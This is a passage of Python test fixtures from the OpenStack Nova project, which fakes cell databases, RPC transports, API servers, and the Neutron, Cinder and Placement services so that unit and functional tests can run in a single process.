return {'id': 1,
'updated_at': None,
'created_at': None,
'host': 'host1',
'cell_mapping': self._fake_cell_list()[0]}
def _fake_instancemapping_get(self, *args):
return {
'id': 1,
'updated_at': None,
'created_at': None,
'instance_uuid': args[-1],
'cell_id': (self.instances_created and 1 or None),
'project_id': 'project',
'cell_mapping': (
self.instances_created and self._fake_cell_get() or None),
}
def _fake_instancemapping_get_uuids(self, *args):
return [self._fake_instancemapping_get(uuid)
for uuid in args[-1]]
def _fake_cell_get(self, *args):
return self._fake_cell_list()[0]
def _fake_cell_list(self, *args):
return [{'id': 1,
'updated_at': None,
'created_at': None,
'uuid': uuidsentinel.cell1,
'name': 'onlycell',
'transport_url': 'fake://nowhere/',
'database_connection': 'sqlite:///'}]
@contextmanager
def _fake_target_cell(self, context, target_cell):
# NOTE(danms): Just pass through the context without actually
# targeting anything.
yield context
class CheatingSerializer(rpc.RequestContextSerializer):
"""A messaging.RequestContextSerializer that helps with cells.
Our normal serializer does not pass in the context like db_connection
and mq_connection, for good reason. We don't really want/need to
force a remote RPC server to use our values for this. However,
during unit and functional tests, since we're all in the same
process, we want cell-targeted RPC calls to preserve these values.
Unless we had per-service config and database layer state for
the fake services we start, this is a reasonable cheat.
"""
def serialize_context(self, context):
"""Serialize context with the db_connection inside."""
values = super(CheatingSerializer, self).serialize_context(context)
values['db_connection'] = context.db_connection
values['mq_connection'] = context.mq_connection
return values
def deserialize_context(self, values):
"""Deserialize context and honor db_connection if present."""
ctxt = super(CheatingSerializer, self).deserialize_context(values)
ctxt.db_connection = values.pop('db_connection', None)
ctxt.mq_connection = values.pop('mq_connection', None)
return ctxt
class CellDatabases(fixtures.Fixture):
"""Create per-cell databases for testing.
How to use::
fix = CellDatabases()
fix.add_cell_database('connection1')
fix.add_cell_database('connection2', default=True)
self.useFixture(fix)
Passing default=True tells the fixture which database should
be given to code that doesn't target a specific cell.
"""
def __init__(self):
self._ctxt_mgrs = {}
self._last_ctxt_mgr = None
self._default_ctxt_mgr = None
# NOTE(danms): Use a ReaderWriterLock to synchronize our
# global database muckery here. If we change global db state
# to point to a cell, we need to take an exclusive lock to
# prevent any other calls to get_context_manager() until we
# reset to the default.
self._cell_lock = lockutils.ReaderWriterLock()
def _cache_schema(self, connection_str):
# NOTE(melwitt): See the regular Database fixture for why
# we do this.
global DB_SCHEMA
if not DB_SCHEMA['main']:
ctxt_mgr = self._ctxt_mgrs[connection_str]
engine = ctxt_mgr.get_legacy_facade().get_engine()
conn = engine.connect()
migration.db_sync(database='main')
DB_SCHEMA['main'] = "".join(line for line
in conn.connection.iterdump())
engine.dispose()
@contextmanager
def _wrap_target_cell(self, context, cell_mapping):
with self._cell_lock.write_lock():
if cell_mapping is None:
# NOTE(danms): The real target_cell untargets with a
# cell_mapping of None. Since we're controlling our
# own targeting in this fixture, we need to call this out
# specifically and avoid switching global database state
try:
with self._real_target_cell(context, cell_mapping) as c:
yield c
finally:
return
ctxt_mgr = self._ctxt_mgrs[cell_mapping.database_connection]
# This assumes the next local DB access is the same cell that
# was targeted last time.
self._last_ctxt_mgr = ctxt_mgr
try:
with self._real_target_cell(context, cell_mapping) as ccontext:
yield ccontext
finally:
# Once we have returned from the context, we need
# to restore the default context manager for any
# subsequent calls
self._last_ctxt_mgr = self._default_ctxt_mgr
def _wrap_create_context_manager(self, connection=None):
ctxt_mgr = self._ctxt_mgrs[connection]
return ctxt_mgr
def _wrap_get_context_manager(self, context):
try:
# If already targeted, we can proceed without a lock
if context.db_connection:
return context.db_connection
except AttributeError:
# Unit tests with None, FakeContext, etc
pass
# NOTE(melwitt): This is a hack to try to deal with
# local accesses i.e. non target_cell accesses.
with self._cell_lock.read_lock():
return self._last_ctxt_mgr
def _wrap_get_server(self, target, endpoints, serializer=None):
"""Mirror rpc.get_server() but with our special sauce."""
serializer = CheatingSerializer(serializer)
return messaging.get_rpc_server(rpc.TRANSPORT,
target,
endpoints,
executor='eventlet',
serializer=serializer)
def _wrap_get_client(self, target, version_cap=None, serializer=None):
"""Mirror rpc.get_client() but with our special sauce."""
serializer = CheatingSerializer(serializer)
return messaging.RPCClient(rpc.TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer)
def add_cell_database(self, connection_str, default=False):
"""Add a cell database to the fixture.
:param connection_str: An identifier used to represent the connection
string for this database. It should match the database_connection field
in the corresponding CellMapping.
"""
# NOTE(danms): Create a new context manager for the cell, which
# will house the sqlite:// connection for this cell's in-memory
# database. Store/index it by the connection string, which is
# how we identify cells in CellMapping.
ctxt_mgr = session.create_context_manager()
self._ctxt_mgrs[connection_str] = ctxt_mgr
# NOTE(melwitt): The first DB access through service start is
# local so this initializes _last_ctxt_mgr for that and needs
# to be a compute cell.
self._last_ctxt_mgr = ctxt_mgr
# NOTE(danms): Record which context manager should be the default
# so we can restore it when we return from target-cell contexts.
# If none has been provided yet, store the current one in case
# no default is ever specified.
if self._default_ctxt_mgr is None or default:
self._default_ctxt_mgr = ctxt_mgr
def get_context_manager(context):
return ctxt_mgr
# NOTE(danms): This is a temporary MonkeyPatch just to get
# a new database created with the schema we need and the
# context manager for it stashed.
with fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.get_context_manager',
get_context_manager):
self._cache_schema(connection_str)
engine = ctxt_mgr.get_legacy_facade().get_engine()
engine.dispose()
conn = engine.connect()
conn.connection.executescript(DB_SCHEMA['main'])
def setUp(self):
super(CellDatabases, self).setUp()
self.addCleanup(self.cleanup)
self._real_target_cell = context.target_cell
# NOTE(danms): These context managers are in place for the
# duration of the test (unlike the temporary ones above) and
# provide the actual "runtime" switching of connections for us.
self.useFixture(fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.create_context_manager',
self._wrap_create_context_manager))
self.useFixture(fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.get_context_manager',
self._wrap_get_context_manager))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell',
self._wrap_target_cell))
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.get_server',
self._wrap_get_server))
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.get_client',
self._wrap_get_client))
def cleanup(self):
for ctxt_mgr in self._ctxt_mgrs.values():
engine = ctxt_mgr.get_legacy_facade().get_engine()
engine.dispose()
class Database(fixtures.Fixture):
def __init__(self, database='main', connection=None):
"""Create a database fixture.
:param database: The type of database, 'main' or 'api'
:param connection: The connection string to use
"""
super(Database, self).__init__()
# NOTE(pkholkin): oslo_db.enginefacade is configured in tests the same
# way as it is done for any other service that uses db
global SESSION_CONFIGURED
if not SESSION_CONFIGURED:
session.configure(CONF)
SESSION_CONFIGURED = True
self.database = database
if database == 'main':
if connection is not None:
ctxt_mgr = session.create_context_manager(
connection=connection)
facade = ctxt_mgr.get_legacy_facade()
self.get_engine = facade.get_engine
else:
self.get_engine = session.get_engine
elif database == 'api':
self.get_engine = session.get_api_engine
def _cache_schema(self):
global DB_SCHEMA
if not DB_SCHEMA[self.database]:
engine = self.get_engine()
conn = engine.connect()
migration.db_sync(database=self.database)
DB_SCHEMA[self.database] = "".join(line for line
in conn.connection.iterdump())
engine.dispose()
def cleanup(self):
engine = self.get_engine()
engine.dispose()
def reset(self):
self._cache_schema()
engine = self.get_engine()
engine.dispose()
conn = engine.connect()
conn.connection.executescript(DB_SCHEMA[self.database])
def setUp(self):
super(Database, self).setUp()
self.reset()
self.addCleanup(self.cleanup)
class DatabaseAtVersion(fixtures.Fixture):
def __init__(self, version, database='main'):
"""Create a database fixture.
:param version: Max version to sync to (or None for current)
:param database: The type of database, 'main' or 'api'
"""
super(DatabaseAtVersion, self).__init__()
self.database = database
self.version = version
if database == 'main':
self.get_engine = session.get_engine
elif database == 'api':
self.get_engine = session.get_api_engine
def cleanup(self):
engine = self.get_engine()
engine.dispose()
def reset(self):
engine = self.get_engine()
engine.dispose()
engine.connect()
migration.db_sync(version=self.version, database=self.database)
def setUp(self):
super(DatabaseAtVersion, self).setUp()
self.reset()
self.addCleanup(self.cleanup)
class DefaultFlavorsFixture(fixtures.Fixture):
def setUp(self):
super(DefaultFlavorsFixture, self).setUp()
ctxt = context.get_admin_context()
defaults = {'rxtx_factor': 1.0, 'disabled': False, 'is_public': True,
'ephemeral_gb': 0, 'swap': 0}
extra_specs = {
"hw:cpu_model": "SandyBridge",
"hw:mem_page_size": "2048",
"hw:cpu_policy": "dedicated"
}
default_flavors = [
objects.Flavor(context=ctxt, memory_mb=512, vcpus=1,
root_gb=1, flavorid='1', name='m1.tiny',
**defaults),
objects.Flavor(context=ctxt, memory_mb=2048, vcpus=1,
root_gb=20, flavorid='2', name='m1.small',
**defaults),
objects.Flavor(context=ctxt, memory_mb=4096, vcpus=2,
root_gb=40, flavorid='3', name='m1.medium',
**defaults),
objects.Flavor(context=ctxt, memory_mb=8192, vcpus=4,
root_gb=80, flavorid='4', name='m1.large',
**defaults),
objects.Flavor(context=ctxt, memory_mb=16384, vcpus=8,
root_gb=160, flavorid='5', name='m1.xlarge',
**defaults),
objects.Flavor(context=ctxt, memory_mb=512, vcpus=1,
root_gb=1, flavorid='6', name='m1.tiny.specs',
extra_specs=extra_specs, **defaults),
]
for flavor in default_flavors:
flavor.create()
class RPCFixture(fixtures.Fixture):
def __init__(self, *exmods):
super(RPCFixture, self).__init__()
self.exmods = []
self.exmods.extend(exmods)
self._buses = {}
def _fake_create_transport(self, url):
# FIXME(danms): Right now, collapse all connections
# to a single bus. This is how our tests expect things
# to work. When the tests are fixed, this fixture can
# support simulating multiple independent buses, and this
# hack should be removed.
url = None
# NOTE(danms): This will be called with a non-None url by
# cells-aware code that is requesting to contact something on
# one of the many transports we're multplexing here.
if url not in self._buses:
exmods = rpc.get_allowed_exmods()
self._buses[url] = messaging.get_rpc_transport(
CONF,
url=url,
allowed_remote_exmods=exmods)
return self._buses[url]
def setUp(self):
super(RPCFixture, self).setUp()
self.addCleanup(rpc.cleanup)
rpc.add_extra_exmods(*self.exmods)
self.addCleanup(rpc.clear_extra_exmods)
self.messaging_conf = messaging_conffixture.ConfFixture(CONF)
self.messaging_conf.transport_driver = 'fake'
self.useFixture(self.messaging_conf)
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.create_transport', self._fake_create_transport))
# NOTE(danms): Execute the init with get_transport_url() as None,
# instead of the parsed TransportURL(None) so that we can cache
# it as it will be called later if the default is requested by
# one of our mq-switching methods.
with mock.patch('nova.rpc.get_transport_url') as mock_gtu:
mock_gtu.return_value = None
rpc.init(CONF)
class WarningsFixture(fixtures.Fixture):
"""Filters out warnings during test runs."""
def setUp(self):
super(WarningsFixture, self).setUp()
# NOTE(sdague): Make deprecation warnings only happen once. Otherwise
# this gets kind of crazy given the way that upstream python libs use
# this.
warnings.simplefilter("once", DeprecationWarning)
warnings.filterwarnings('ignore',
message='With-statements now directly support'
' multiple context managers')
# NOTE(sdague): nova does not use pkg_resources directly, this
# is all very long standing deprecations about other tools
# using it. None of this is useful to Nova development.
warnings.filterwarnings('ignore',
module='pkg_resources')
# NOTE(sdague): this remains an unresolved item around the way
# forward on is_admin, the deprecation is definitely really premature.
warnings.filterwarnings('ignore',
message='Policy enforcement is depending on the value of is_admin.'
' This key is deprecated. Please update your policy '
'file to use the standard policy values.')
# NOTE(sdague): mox3 is on life support, don't really care
# about any deprecations coming from it
warnings.filterwarnings('ignore',
module='mox3.mox')
self.addCleanup(warnings.resetwarnings)
class ConfPatcher(fixtures.Fixture):
"""Fixture to patch and restore global CONF.
This also resets overrides for everything that is patched during
it's teardown.
"""
def __init__(self, **kwargs):
"""Constructor
:params group: if specified all config options apply to that group.
:params **kwargs: the rest of the kwargs are processed as a
set of key/value pairs to be set as configuration override.
"""
super(ConfPatcher, self).__init__()
self.group = kwargs.pop('group', None)
self.args = kwargs
def setUp(self):
super(ConfPatcher, self).setUp()
for k, v in self.args.items():
self.addCleanup(CONF.clear_override, k, self.group)
CONF.set_override(k, v, self.group)
class OSAPIFixture(fixtures.Fixture):
"""Create an OS API server as a fixture.
This spawns an OS API server as a fixture in a new greenthread in
the current test. The fixture has a .api parameter with is a
simple rest client that can communicate with it.
This fixture is extremely useful for testing REST responses
through the WSGI stack easily in functional tests.
Usage:
api = self.useFixture(fixtures.OSAPIFixture()).api
resp = api.api_request('/someurl')
self.assertEqual(200, resp.status_code)
resp = api.api_request('/otherurl', method='POST', body='{foo}')
The resp is a requests library response. Common attributes that
you'll want to use are:
- resp.status_code - integer HTTP status code returned by the request
- resp.content - the body of the response
- resp.headers - dictionary of HTTP headers returned
"""
def __init__(self, api_version='v2',
project_id='6f70656e737461636b20342065766572'):
"""Constructor
:param api_version: the API version that we're interested in
using. Currently this expects 'v2' or 'v2.1' as possible
options.
:param project_id: the project id to use on the API.
"""
super(OSAPIFixture, self).__init__()
self.api_version = api_version
self.project_id = project_id
def setUp(self):
super(OSAPIFixture, self).setUp()
# in order to run these in tests we need to bind only to local
# host, and dynamically allocate ports
conf_overrides = {
'osapi_compute_listen': '127.0.0.1',
'osapi_compute_listen_port': 0,
'debug': True,
}
self.useFixture(ConfPatcher(**conf_overrides))
self.osapi = service.WSGIService("osapi_compute")
self.osapi.start()
self.addCleanup(self.osapi.stop)
self.auth_url = 'http://%(host)s:%(port)s/%(api_version)s' % ({
'host': self.osapi.host, 'port': self.osapi.port,
'api_version': self.api_version})
self.api = client.TestOpenStackClient('fake', 'fake', self.auth_url,
self.project_id)
self.admin_api = client.TestOpenStackClient(
'admin', 'admin', self.auth_url, self.project_id)
class OSMetadataServer(fixtures.Fixture):
"""Create an OS Metadata API server as a fixture.
This spawns an OS Metadata API server as a fixture in a new
greenthread in the current test.
TODO(sdague): ideally for testing we'd have something like the
test client which acts like requests, but connects any of the
interactions needed.
"""
def setUp(self):
super(OSMetadataServer, self).setUp()
# in order to run these in tests we need to bind only to local
# host, and dynamically allocate ports
conf_overrides = {
'metadata_listen': '127.0.0.1',
'metadata_listen_port': 0,
'debug': True
}
self.useFixture(ConfPatcher(**conf_overrides))
# NOTE(mikal): we don't have root to manipulate iptables, so just
# zero that bit out.
self.useFixture(fixtures.MonkeyPatch(
'nova.network.linux_net.IptablesManager._apply',
lambda _: None))
self.metadata = service.WSGIService("metadata")
self.metadata.start()
self.addCleanup(self.metadata.stop)
self.md_url = "http://%s:%s/" % (
conf_overrides['metadata_listen'],
self.metadata.port)
class PoisonFunctions(fixtures.Fixture):
"""Poison functions so they explode if we touch them.
When running under a non full stack test harness there are parts
of the code that you don't want to go anywhere near. These include
things like code that spins up extra threads, which just
introduces races.
"""
def setUp(self):
super(PoisonFunctions, self).setUp()
# The nova libvirt driver starts an event thread which only
# causes trouble in tests. Make sure that if tests don't
# properly patch it the test explodes.
# explicit import because MonkeyPatch doesn't magic import
# correctly if we are patching a method on a class in a
# module.
import nova.virt.libvirt.host # noqa
def evloop(*args, **kwargs):
import sys
warnings.warn("Forgot to disable libvirt event thread")
sys.exit(1)
self.useFixture(fixtures.MonkeyPatch(
'nova.virt.libvirt.host.Host._init_events',
evloop))
class IndirectionAPIFixture(fixtures.Fixture):
"""Patch and restore the global NovaObject indirection api."""
def __init__(self, indirection_api):
"""Constructor
:param indirection_api: the indirection API to be used for tests.
"""
super(IndirectionAPIFixture, self).__init__()
self.indirection_api = indirection_api
def cleanup(self):
obj_base.NovaObject.indirection_api = self.orig_indirection_api
def setUp(self):
super(IndirectionAPIFixture, self).setUp()
self.orig_indirection_api = obj_base.NovaObject.indirection_api
obj_base.NovaObject.indirection_api = self.indirection_api
self.addCleanup(self.cleanup)
class _FakeGreenThread(object):
def __init__(self, func, *args, **kwargs):
self._result = func(*args, **kwargs)
def cancel(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def kill(self, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def link(self, func, *args, **kwargs):
func(self, *args, **kwargs)
def unlink(self, func, *args, **kwargs):
# This method doesn't make sense for a synchronous call, it's just
# defined to satisfy the interface.
pass
def wait(self):
return self._result
class SpawnIsSynchronousFixture(fixtures.Fixture):
"""Patch and restore the spawn_n utility method to be synchronous"""
def setUp(self):
super(SpawnIsSynchronousFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.utils.spawn_n', _FakeGreenThread))
self.useFixture(fixtures.MonkeyPatch(
'nova.utils.spawn', _FakeGreenThread))
class BannedDBSchemaOperations(fixtures.Fixture):
"""Ban some operations for migrations"""
def __init__(self, banned_resources=None):
super(BannedDBSchemaOperations, self).__init__()
self._banned_resources = banned_resources or []
@staticmethod
def _explode(resource, op):
raise exception.DBNotAllowed(
'Operation %s.%s() is not allowed in a database migration' % (
resource, op))
def setUp(self):
super(BannedDBSchemaOperations, self).setUp()
for thing in self._banned_resources:
self.useFixture(fixtures.MonkeyPatch(
'sqlalchemy.%s.drop' % thing,
lambda *a, **k: self._explode(thing, 'drop')))
self.useFixture(fixtures.MonkeyPatch(
'sqlalchemy.%s.alter' % thing,
lambda *a, **k: self._explode(thing, 'alter')))
class ForbidNewLegacyNotificationFixture(fixtures.Fixture):
"""Make sure the test fails if new legacy notification is added"""
def __init__(self):
super(ForbidNewLegacyNotificationFixture, self).__init__()
self.notifier = rpc.LegacyValidatingNotifier
def setUp(self):
super(ForbidNewLegacyNotificationFixture, self).setUp()
self.notifier.fatal = True
# allow the special test value used in
# nova.tests.unit.test_notifications.NotificationsTestCase
self.notifier.allowed_legacy_notification_event_types.append(
'_decorated_function')
self.addCleanup(self.cleanup)
def cleanup(self):
self.notifier.fatal = False
self.notifier.allowed_legacy_notification_event_types.remove(
'_decorated_function')
class AllServicesCurrent(fixtures.Fixture):
def setUp(self):
super(AllServicesCurrent, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.Service.get_minimum_version_multi',
self._fake_minimum))
compute_rpcapi.LAST_VERSION = None
def _fake_minimum(self, *args, **kwargs):
return service_obj.SERVICE_VERSION
class RegisterNetworkQuota(fixtures.Fixture):
def setUp(self):
super(RegisterNetworkQuota, self).setUp()
# Quota resource registration modifies the global QUOTAS engine, so
# this fixture registers and unregisters network quota for a test.
tenant_networks._register_network_quota()
self.addCleanup(self.cleanup)
def cleanup(self):
nova_quota.QUOTAS._resources.pop('networks', None)
class NeutronFixture(fixtures.Fixture):
"""A fixture to boot instances with neutron ports"""
# the default project_id in OsaAPIFixtures
tenant_id = '6f70656e737461636b20342065766572'
network_1 = {
'status': 'ACTIVE',
'subnets': [],
'name': 'private-network',
'admin_state_up': True,
'tenant_id': tenant_id,
'id': '3cb9bc59-5699-4588-a4b1-b87f96708bc6',
}
subnet_1 = {
'name': 'private-subnet',
'enable_dhcp': True,
'network_id': network_1['id'],
'tenant_id': tenant_id,
'dns_nameservers': [],
'allocation_pools': [
{
'start': '192.168.1.1',
'end': '192.168.1.254'
}
],
'host_routes': [],
'ip_version': 4,
'gateway_ip': '192.168.1.1',
'cidr': '192.168.1.1/24',
'id': 'f8a6e8f8-c2ec-497c-9f23-da9616de54ef'
}
network_1['subnets'] = [subnet_1['id']]
port_1 = {
'id': 'ce531f90-199f-48c0-816c-13e38010b442',
'network_id': network_1['id'],
'admin_state_up': True,
'status': 'ACTIVE',
'mac_address': 'fa:16:3e:4c:2c:30',
'fixed_ips': [
{
# The IP on this port must be a prefix of the IP on port_2 to
# test listing servers with an ip filter regex.
'ip_address': '192.168.1.3',
'subnet_id': subnet_1['id']
}
],
'tenant_id': tenant_id
}
# This port is only used if the fixture is created with multiple_ports=True
port_2 = {
'id': '88dae9fa-0dc6-49e3-8c29-3abc41e99ac9',
'network_id': network_1['id'],
'admin_state_up': True,
'status': 'ACTIVE',
'mac_address': '00:0c:29:0d:11:74',
'fixed_ips': [
{
'ip_address': '192.168.1.30',
'subnet_id': subnet_1['id']
}
],
'tenant_id': tenant_id
}
nw_info = [{
"profile": {},
"ovs_interfaceid": "b71f1699-42be-4515-930a-f3ef01f94aa7",
"preserve_on_delete": False,
"network": {
"bridge": "br-int",
"subnets": [{
"ips": [{
"meta": {},
"version": 4,
"type": "fixed",
"floating_ips": [],
"address": "10.0.0.4"
}],
"version": 4,
"meta": {},
"dns": [],
"routes": [],
"cidr": "10.0.0.0/26",
"gateway": {
"meta": {},
"version": 4,
"type": "gateway",
"address": "10.0.0.1"
}
}],
"meta": {
"injected": False,
"tenant_id": tenant_id,
"mtu": 1500
},
"id": "e1882e38-38c2-4239-ade7-35d644cb963a",
"label": "public"
},
"devname": "tapb71f1699-42",
"vnic_type": "normal",
"qbh_params": None,
"meta": {},
"details": {
"port_filter": True,
"ovs_hybrid_plug": True
},
"address": "fa:16:3e:47:94:4a",
"active": True,
"type": "ovs",
"id": "b71f1699-42be-4515-930a-f3ef01f94aa7",
"qbg_params": None
}]
def __init__(self, test, multiple_ports=False):
super(NeutronFixture, self).__init__()
self.test = test
self.multiple_ports = multiple_ports
def setUp(self):
super(NeutronFixture, self).setUp()
self.test.stub_out(
'nova.network.neutronv2.api.API.'
'validate_networks',
lambda *args, **kwargs: 1)
self.test.stub_out(
'nova.network.neutronv2.api.API.'
'create_pci_requests_for_sriov_ports',
lambda *args, **kwargs: None)
self.test.stub_out(
'nova.network.neutronv2.api.API.setup_networks_on_host',
lambda *args, **kwargs: None)
self.test.stub_out(
'nova.network.neutronv2.api.API.migrate_instance_start',
lambda *args, **kwargs: None)
self.test.stub_out(
'nova.network.neutronv2.api.API.add_fixed_ip_to_instance',
lambda *args, **kwargs: network_model.NetworkInfo.hydrate(
NeutronFixture.nw_info))
self.test.stub_out(
'nova.network.neutronv2.api.API.remove_fixed_ip_from_instance',
lambda *args, **kwargs: network_model.NetworkInfo.hydrate(
NeutronFixture.nw_info))
self.test.stub_out(
'nova.network.neutronv2.api.API.migrate_instance_finish',
lambda *args, **kwargs: None)
self.test.stub_out(
'nova.network.security_group.neutron_driver.SecurityGroupAPI.'
'get_instances_security_groups_bindings',
lambda *args, **kwargs: {})
mock_neutron_client = mock.Mock()
mock_neutron_client.list_extensions.return_value = {'extensions': []}
def stub_show_port(port_id, *args, **kwargs):
if port_id == NeutronFixture.port_1['id']:
return {'port': NeutronFixture.port_1}
if port_id == NeutronFixture.port_2['id']:
return {'port': NeutronFixture.port_2}
raise exception.PortNotFound(port_id=port_id)
mock_neutron_client.show_port.side_effect = stub_show_port
mock_neutron_client.list_networks.return_value = {
'networks': [NeutronFixture.network_1]}
def stub_list_ports(*args, **kwargs):
ports = {'ports': [NeutronFixture.port_1]}
if self.multiple_ports:
ports['ports'].append(NeutronFixture.port_2)
return ports
mock_neutron_client.list_ports.side_effect = stub_list_ports
mock_neutron_client.list_subnets.return_value = {
'subnets': [NeutronFixture.subnet_1]}
mock_neutron_client.list_floatingips.return_value = {'floatingips': []}
mock_neutron_client.update_port.side_effect = stub_show_port
self.test.stub_out(
'nova.network.neutronv2.api.get_client',
lambda *args, **kwargs: mock_neutron_client)
class _NoopConductor(object):
def __getattr__(self, key):
def _noop_rpc(*args, **kwargs):
return None
return _noop_rpc
class NoopConductorFixture(fixtures.Fixture):
"""Stub out the conductor API to do nothing"""
def setUp(self):
super(NoopConductorFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.conductor.ComputeTaskAPI', _NoopConductor))
self.useFixture(fixtures.MonkeyPatch(
'nova.conductor.API', _NoopConductor))
class EventReporterStub(fixtures.Fixture):
def setUp(self):
super(EventReporterStub, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.compute.utils.EventReporter',
lambda *args, **kwargs: mock.MagicMock()))
class CinderFixture(fixtures.Fixture):
"""A fixture to volume operations"""
# the default project_id in OSAPIFixtures
tenant_id = '6f70656e737461636b20342065766572'
SWAP_OLD_VOL = 'a07f71dc-8151-4e7d-a0cc-cd24a3f11113'
SWAP_NEW_VOL = '227cc671-f30b-4488-96fd-7d0bf13648d8'
SWAP_ERR_OLD_VOL = '828419fa-3efb-4533-b458-4267ca5fe9b1'
SWAP_ERR_NEW_VOL = '9c6d9c2d-7a8f-4c80-938d-3bf062b8d489'
def __init__(self, test):
super(CinderFixture, self).__init__()
self.test = test
self.swap_error = False
self.swap_volume_instance_uuid = None
self.swap_volume_instance_error_uuid = None
# This is a map of instance UUIDs mapped to a list of volume IDs.
# This map gets updated on attach/detach operations.
self.attachments = collections.defaultdict(list)
def setUp(self):
super(CinderFixture, self).setUp()
def fake_get(self_api, context, volume_id):
# Check for the special swap volumes.
if volume_id in (CinderFixture.SWAP_OLD_VOL,
CinderFixture.SWAP_ERR_OLD_VOL):
volume = {
'status': 'available',
'display_name': 'TEST1',
'attach_status': 'detached',
'id': volume_id,
'size': 1
}
if ((self.swap_volume_instance_uuid and
volume_id == CinderFixture.SWAP_OLD_VOL) or
(self.swap_volume_instance_error_uuid and
volume_id == CinderFixture.SWAP_ERR_OLD_VOL)):
instance_uuid = (self.swap_volume_instance_uuid
if volume_id == CinderFixture.SWAP_OLD_VOL
else self.swap_volume_instance_error_uuid)
volume.update({
'status': 'in-use',
'attachments': {
instance_uuid: {
'mountpoint': '/dev/vdb',
'attachment_id': volume_id
}
},
'attach_status': 'attached'
})
return volume
# Check to see if the volume is attached.
for instance_uuid, volumes in self.attachments.items():
if volume_id in volumes:
# The volume is attached.
volume = {
'status': 'in-use',
'display_name': volume_id,
'attach_status': 'attached',
'id': volume_id,
'size': 1,
'attachments': {
instance_uuid: {
'attachment_id': volume_id,
'mountpoint': '/dev/vdb'
}
}
}
break
else:
# This is a test that does not care about the actual details.
volume = {
'status': 'available',
'display_name': 'TEST2',
'attach_status': 'detached',
'id': volume_id,
'size': 1
}
# update the status based on existing attachments
has_attachment = any(
[volume['id'] in attachments
for attachments in self.attachments.values()])
volume['status'] = 'attached' if has_attachment else 'detached'
return volume
def fake_initialize_connection(self, context, volume_id, connector):
if volume_id == CinderFixture.SWAP_ERR_NEW_VOL:
# Return a tuple in order to raise an exception.
return ()
return {}
def fake_migrate_volume_completion(self, context, old_volume_id,
new_volume_id, error):
return {'save_volume_id': new_volume_id}
def fake_unreserve_volume(self_api, context, volume_id):
# Signaling that swap_volume has encountered the error
# from initialize_connection and is working on rolling back
# the reservation on SWAP_ERR_NEW_VOL.
self.swap_error = True
def fake_attach(_self, context, volume_id, instance_uuid,
mountpoint, mode='rw'):
# Check to see if the volume is already attached to any server.
for instance, volumes in self.attachments.items():
if volume_id in volumes:
raise exception.InvalidInput(
reason='Volume %s is already attached to '
'instance %s' % (volume_id, instance))
# It's not attached so let's "attach" it.
self.attachments[instance_uuid].append(volume_id)
self.test.stub_out('nova.volume.cinder.API.attach',
fake_attach)
def fake_detach(_self, context, volume_id, instance_uuid=None,
attachment_id=None):
if instance_uuid is not None:
# If the volume isn't attached to this instance it will
# result in a ValueError which indicates a broken test or
# code, so we just let that raise up.
self.attachments[instance_uuid].remove(volume_id)
else:
for instance, volumes in self.attachments.items():
if volume_id in volumes:
volumes.remove(volume_id)
break
self.test.stub_out('nova.volume.cinder.API.detach', fake_detach)
self.test.stub_out('nova.volume.cinder.API.begin_detaching',
lambda *args, **kwargs: None)
self.test.stub_out('nova.volume.cinder.API.get',
fake_get)
self.test.stub_out('nova.volume.cinder.API.initialize_connection',
fake_initialize_connection)
self.test.stub_out(
'nova.volume.cinder.API.migrate_volume_completion',
fake_migrate_volume_completion)
self.test.stub_out('nova.volume.cinder.API.reserve_volume',
lambda *args, **kwargs: None)
self.test.stub_out('nova.volume.cinder.API.roll_detaching',
lambda *args, **kwargs: None)
self.test.stub_out('nova.volume.cinder.API.terminate_connection',
lambda *args, **kwargs: None)
self.test.stub_out('nova.volume.cinder.API.unreserve_volume',
fake_unreserve_volume)
class PlacementFixture(fixtures.Fixture):
"""A fixture to placement operations.
Runs a local WSGI server bound on a free port and having the Placement
application with NoAuth middleware.
This fixture also prevents calling the ServiceCatalog for getting the
endpoint.
It's possible to ask for a specific token when running the fixtures so
all calls would be passing this token.
"""
def __init__(self, token='admin'):
self.token = token
def setUp(self):
super(PlacementFixture, self).setUp()
self.useFixture(ConfPatcher(group='api', auth_strategy='noauth2'))
loader = placement_deploy.loadapp(CONF)
app = lambda: loader
host = uuidsentinel.placement_host
self.endpoint = 'http://%s/placement' % host
intercept = interceptor.RequestsInterceptor(app, url=self.endpoint)
intercept.install_intercept()
self.addCleanup(intercept.uninstall_intercept)
# Turn off manipulation of socket_options in TCPKeepAliveAdapter
# to keep wsgi-intercept happy. Replace it with the method
# from its superclass.
self.useFixture(fixtures.MonkeyPatch(
'keystoneauth1.session.TCPKeepAliveAdapter.init_poolmanager',
adapters.HTTPAdapter.init_poolmanager))
self._client = ks.Session(auth=None)
# NOTE(sbauza): We need to mock the scheduler report client because
# we need to fake Keystone by directly calling the endpoint instead
# of looking up the service catalog, like we did for the OSAPIFixture.
self.useFixture(fixtures.MonkeyPatch(
'nova.scheduler.client.report.SchedulerReportClient.get',
self._fake_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.scheduler.client.report.SchedulerReportClient.post',
self._fake_post))
self.useFixture(fixtures.MonkeyPatch(
'nova.scheduler.client.report.SchedulerReportClient.put',
self._fake_put))
self.useFixture(fixtures.MonkeyPatch(
'nova.scheduler.client.report.SchedulerReportClient.delete',
self._fake_delete))
@staticmethod
def _update_headers_with_version(headers, **kwargs):
version = kwargs.get("version")
if version is not None:
# TODO(mriedem): Perform some version discovery at some point.
headers.update({
'OpenStack-API-Version': 'placement %s' % version
})
def _fake_get(self, *args, **kwargs):
(url,) = args[1:]
# TODO(sbauza): The current placement NoAuthMiddleware returns a 401
# in case a token is not provided. We should change that by creating
# a fake token so we could remove adding the header below.
headers = {'x-auth-token': self.token}
self._update_headers_with_version(headers, **kwargs)
return self._client.get(
url,
endpoint_override=self.endpoint,
